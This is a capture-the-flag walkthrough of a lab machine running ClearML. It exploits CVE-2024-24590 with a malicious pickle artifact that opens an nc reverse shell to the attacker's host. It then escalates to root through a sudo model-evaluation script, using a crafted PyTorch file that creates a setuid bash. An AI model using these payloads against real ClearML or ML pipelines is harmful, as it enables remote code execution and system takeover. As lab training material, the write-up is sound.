This box was very interesting. It starts with exploiting a vulnerability in ClearML, an open-source platform used to automate the development of machine learning solutions, to get a shell as a user. Initial access comes from CVE-2024-24590: we create and upload a malicious pickle artifact that runs a reverse shell command when it is deserialized. After securing user access, we escalate privileges through a sudo rule for a model evaluation script. A crafted PyTorch model that the script's scanner does not rate as overtly malicious runs our command as root when it is loaded, which gives us a setuid copy of bash and a root shell.

Nmap scan

First, we scan the server for open ports:

nmap -sV -sC 10.10.11.19 -v

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)

| ssh-hostkey:

| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)

| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)

|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)

80/tcp open http nginx 1.18.0

|_http-title: Did not follow redirect to http://app.blurry.htb/

|_http-server-header: nginx/1.18.0

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have OpenSSH on port 22 and a web server (nginx) on port 80 open.
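As a small aside, the open ports and the redirect target can be pulled out of the scan text programmatically. This is only a sketch: the function names open_ports and redirect_hosts are made up for illustration, and the sample lines are copied from the output above.

```python
import re

# Sample lines copied from the scan output above.
NMAP_OUTPUT = """\
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
"""

# Matches lines such as "80/tcp open http nginx 1.18.0".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def open_ports(text):
    """Return (port, protocol, service, version) for every open port line."""
    results = []
    for line in text.splitlines():
        match = PORT_LINE.match(line.strip())
        if match:
            port, proto, service, version = match.groups()
            results.append((int(port), proto, service, version))
    return results


def redirect_hosts(text):
    """Return host names mentioned in 'redirect to http://...' script output."""
    return re.findall(r"redirect to https?://([^/\s]+)", text)


if __name__ == "__main__":
    for entry in open_ports(NMAP_OUTPUT):
        print(entry)
    print(redirect_hosts(NMAP_OUTPUT))
```

The redirect host is the interesting part here, since it is the name that has to go into the hosts file next.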

Web Enumeration

Nmap shows a redirect to the subdomain app.blurry.htb, so let's add it to the hosts file first:

echo "10.10.11.19 blurry.htb app.blurry.htb" | sudo tee -a /etc/hosts

blurry.htb is just a redirect to app.blurry.htb:

curl -sSL -D - -o/dev/null http://blurry.htb

HTTP/1.1 301 Moved Permanently

Server: nginx/1.18.0

Date: Sun, 14 Jul 2024 06:20:34 GMT

Content-Type: text/html

Content-Length: 169

Connection: keep-alive

Location: http://app.blurry.htb/

HTTP/1.1 200 OK

Server: nginx/1.18.0

Date: Sun, 14 Jul 2024 06:20:34 GMT

Content-Type: text/html

Content-Length: 13327

Connection: keep-alive

Last-Modified: Thu, 14 Dec 2023 09:38:26 GMT

ETag: "657acd12-340f"

Accept-Ranges: bytes

Checking http://app.blurry.htb

ClearML is an open source platform that automates and simplifies developing and managing machine learning solutions.

Providing any name gives us access to a dashboard.

Navigating to http://app.blurry.htb/settings/profile shows the following versions: WebApp: 1.13.1-426 • Server: 1.13.1-426 • API: 2.27



When trying to create a new experiment, two new subdomains appear, so let's add them to the hosts file as well:

echo "10.10.11.19 api.blurry.htb files.blurry.htb" | sudo tee -a /etc/hosts

CVE-2024-24590

After some searching, I found an article highlighting multiple CVEs.

The most interesting one is CVE-2024-24590: Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.
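A quick way to reason about the affected range is a version comparison. The sketch below assumes plain dotted versions and takes the bounds from the advisory text quoted above. The function names are illustrative, and the range applies to the client SDK, not to the server version shown on the profile page.

```python
# Bounds taken from the advisory wording above (client SDK versions).
AFFECTED_MIN = (0, 17, 0)
AFFECTED_MAX = (1, 14, 2)


def parse_version(text):
    """Turn '1.13.1' into (1, 13, 1). Pre-release suffixes are not handled."""
    return tuple(int(part) for part in text.split("."))


def sdk_in_affected_range(version):
    """True if a dotted SDK version falls inside the quoted affected range."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


if __name__ == "__main__":
    for candidate in ("0.16.9", "0.17.0", "1.14.1", "1.14.3"):
        print(candidate, sdk_in_affected_range(candidate))
```

On a machine where the SDK is installed, importlib.metadata.version("clearml") from the standard library returns the installed version string that could be fed into this check.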

Exploit preparation

As per the instructions on the experiment page, we can apply the setup steps on Kali:

pip install clearml

export PATH=~/.local/bin:$PATH

clearml-init

┌──(mohammad㉿kali)-[~/htb/blurry]

└─$ clearml-init

ClearML SDK setup process

Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)

Or create a free account at https://app.clear.ml/settings/workspace-configuration

In settings page, press "Create new credentials", then press "Copy to clipboard".

Paste copied configuration here:

api {

web_server: http://app.blurry.htb

api_server: http://api.blurry.htb

files_server: http://files.blurry.htb

credentials {

"access_key" = "EOZU4N9OMPYA16Q1XTRC"

"secret_key" = "6KH3TanziQcbMiyboUV8C6m0ghCccJ2rJVhc8qSvEKDwAX4Unc"

}

}

Detected credentials key="EOZU4N9OMPYA16Q1XTRC" secret="6KH3***"

ClearML Hosts configuration:

Web App: http://app.blurry.htb

API: http://api.blurry.htb

File Store: http://files.blurry.htb

Verifying credentials ...

Credentials verified!

New configuration stored in /home/mohammad/clearml.conf

ClearML setup completed successfully.

Own user

The idea is to create an exploit script that:

- Initializes the ClearML task

- Defines the reverse shell command

- Saves the payload to a pickle file

- Uploads the payload as an artifact to ClearML

import pickle
import os
from clearml import Task

# Initialize ClearML task
clearml_task = Task.init(project_name='Black Swan', task_name='test', tags=["review"])

# Define a class for the malicious payload
class ReverseShellPayload:
    def __reduce__(self):
        shell_command = (
            "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.x 4444 > /tmp/f"
        )
        return (os.system, (shell_command,))

# Create an instance of the payload class
payload_instance = ReverseShellPayload()

# Specify the pickle filename
pickle_file = 'reverse_shell_payload.pkl'

# Write the malicious object to a local pickle file
with open(pickle_file, 'wb') as file:
    pickle.dump(payload_instance, file)

print("Pickle file with reverse shell payload created.")

# Upload the payload object as an artifact to ClearML
clearml_task.upload_artifact(name='reverse_shell_payload', artifact_object=payload_instance, wait_on_upload=True, retries=2)

The ReverseShellPayload class defines a __reduce__ method. The pickle module calls this method to decide how the object is serialized: it returns a callable and its arguments, and that callable is invoked with those arguments when the data is deserialized. Here that means os.system runs our shell command on the system of whoever loads the artifact.
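To see the mechanism without anything dangerous, here is a minimal sketch that swaps os.system for a harmless built-in. The class name Harmless and the use of sorted are illustrative assumptions, not part of the exploit.

```python
import pickle


class Harmless:
    """Stand-in for the payload class, using a benign callable."""

    def __reduce__(self):
        # pickle stores this (callable, args) pair instead of the object.
        # On load, the unpickler calls sorted([3, 1, 2]).
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Harmless())

# Loading does not rebuild a Harmless instance. It returns whatever
# the stored callable returns when invoked with the stored arguments.
result = pickle.loads(blob)

if __name__ == "__main__":
    print(type(result).__name__, result)
```

The loader never needs the Harmless class to exist on its side. Only the callable has to be importable there, which is why os.system works so well as a payload.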

Now we start an nc listener and run the exploit from another terminal:

rlwrap nc -vlp 4444

python3 exploit.py

listening on [any] 4444 ...

connect to [10.10.14.x] from blurry.htb [10.10.11.19] 38432

/bin/sh: 0: can't access tty; job control turned off

$ id

uid=1000(jippity) gid=1000(jippity) groups=1000(jippity)

It is best to get an SSH shell by adding our public key:

echo 'ssh-rsa ......K2Xt7qQ3IsemKi2Ekb1ROxQAa8MG+C9rTOf4rtGFIMoIgYdtL/jt/Zvys+r66aIa6n+L0XfYo6Eyc= mohammad@mohammad' >> .ssh/authorized_keys

So we can just SSH in afterward:

└─$ ssh jippity@blurry.htb

The authenticity of host 'blurry.htb (10.10.11.19)' can't be established.

ED25519 key fingerprint is SHA256:Yr2plP6C5tZyGiCNZeUYNDmsDGrfGijissa6WJo0yPY.

This host key is known by the following other names/addresses:

~/.ssh/known_hosts:37: [hashed name]

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

....

jippity@blurry:~$ wc -c user.txt

33 user.txt

jippity@blurry:~$

Note: the server also has an id_rsa key that can be used to SSH in as this user.

Privilege escalation

First, we check whether the user can run commands as root:

sudo -l

Matching Defaults entries for jippity on blurry:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jippity may run the following commands on blurry:

(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

Checking /usr/bin/evaluate_model:

#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi

The first point to check is the permissions on the /models directory:

drwxrwxr-x 2 root jippity 4.0K Jun 17 14:11 models

The directory is group-owned by jippity with rwx permissions, so this user can read, write, and execute in it, which is a very important point.
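For readers less used to reading mode strings, the sketch below decodes the same permissions with Python's stat module. The numeric mode 0o040775 is my own translation of drwxrwxr-x, and the helper name group_can_write is illustrative.

```python
import stat

# Numeric equivalent of "drwxrwxr-x": directory type bits plus 0775.
MODELS_DIR_MODE = 0o040775


def group_can_write(mode):
    """True if the group write bit is set in a st_mode value."""
    return bool(mode & stat.S_IWGRP)


if __name__ == "__main__":
    # stat.filemode renders a mode the same way ls -l does.
    print(stat.filemode(MODELS_DIR_MODE))
    print("group write:", group_can_write(MODELS_DIR_MODE))
```

On the box itself, the real value would come from os.stat("/models").st_mode. Group write on the directory is what lets jippity drop a new .pth file where the sudo rule expects it.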

Script explanation

The script takes a model as its single command-line argument. Per the sudo rule it must match /models/*.pth, and it must be a tar or zip archive.
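The archive check can be approximated in Python. Note that this is a swapped-in technique: the real script relies on the output of the file utility, while this sketch uses the standard library's zipfile and tarfile detection, and the function name archive_kind is hypothetical.

```python
import tarfile
import zipfile


def archive_kind(path):
    """Classify a file roughly the way the script's if/elif/else branch does.

    Returns "zip", "tar", or "unknown". Detection is done by the standard
    library here, not by the file utility the real script calls.
    """
    if zipfile.is_zipfile(path):
        return "zip"
    if tarfile.is_tarfile(path):
        return "tar"
    return "unknown"


if __name__ == "__main__":
    import sys

    for candidate in sys.argv[1:]:
        print(candidate, archive_kind(candidate))
```

A model written by torch.save in its current default format is a zip archive, which matches the "newer PyTorch format" comment in the script.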

Any pickle files inside the archive are scanned with fickling. If none of them is rated OVERTLY_MALICIOUS, /models/evaluate_model.py is executed on the model; otherwise the model file is simply removed. That Python script is designed to load a pre-trained neural network model, prepare a test dataset, and evaluate the model's performance on that dataset.
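The gate that decides whether a model is deleted is the jq filter on the severity field. A Python equivalent might look like the sketch below. Only the severity key and the OVERTLY_MALICIOUS value come from the script; the sample JSON strings and the SOME_OTHER_RATING placeholder are assumptions for illustration.

```python
import json


def is_overtly_malicious(fickling_json):
    """Mirror the jq test: select(.severity == "OVERTLY_MALICIOUS")."""
    report = json.loads(fickling_json)
    return report.get("severity") == "OVERTLY_MALICIOUS"


# Hypothetical scanner outputs, reduced to the one field the script reads.
FLAGGED = '{"severity": "OVERTLY_MALICIOUS"}'
NOT_FLAGGED = '{"severity": "SOME_OTHER_RATING"}'

if __name__ == "__main__":
    print(is_overtly_malicious(FLAGGED))
    print(is_overtly_malicious(NOT_FLAGGED))
```

The comparison is an exact string match, so any rating other than OVERTLY_MALICIOUS lets the model through to the Python evaluation step.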

Own root

We have to create a script that builds a malicious model which executes system commands when it is loaded. To hide our tracks a bit, we can create a directory in /home/jippity called .exploit and create exploit.py there.

The easiest way is to copy the bash binary, set the setuid bit on the copy, and then start a privileged shell.

import torch
import torch.nn as nn
import os

class CustomModel(nn.Module):
    def __init__(self):
        super(CustomModel, self).__init__()
        self.dense = nn.Linear(10, 1)

    def forward(self, x):
        return self.dense(x)

    def __reduce__(self):
        # Runs as root when the model is loaded by the sudo script
        command = "cp /bin/bash /home/jippity/.exploit/bash && chmod +s /home/jippity/.exploit/bash"
        return os.system, (command,)

model_instance = CustomModel()
torch.save(model_instance, '/models/exploit.pth')

Generate the malicious model and pass it to the bash script that runs with sudo:

python3 exploit.py;sudo /usr/bin/evaluate_model /models/exploit.pth

Now checking the directory contents:

jippity@blurry:~/.exploit$ ls -lht

total 1.2M

-rwsr-sr-x 1 root root 1.2M Jul 14 06:59 bash

Finally, we can get a root shell:

./bash -p

bash-5.1# wc -c /root/root.txt

33 /root/root.txt

bash-5.1#

The box is finally owned! Your feedback is much appreciated 😄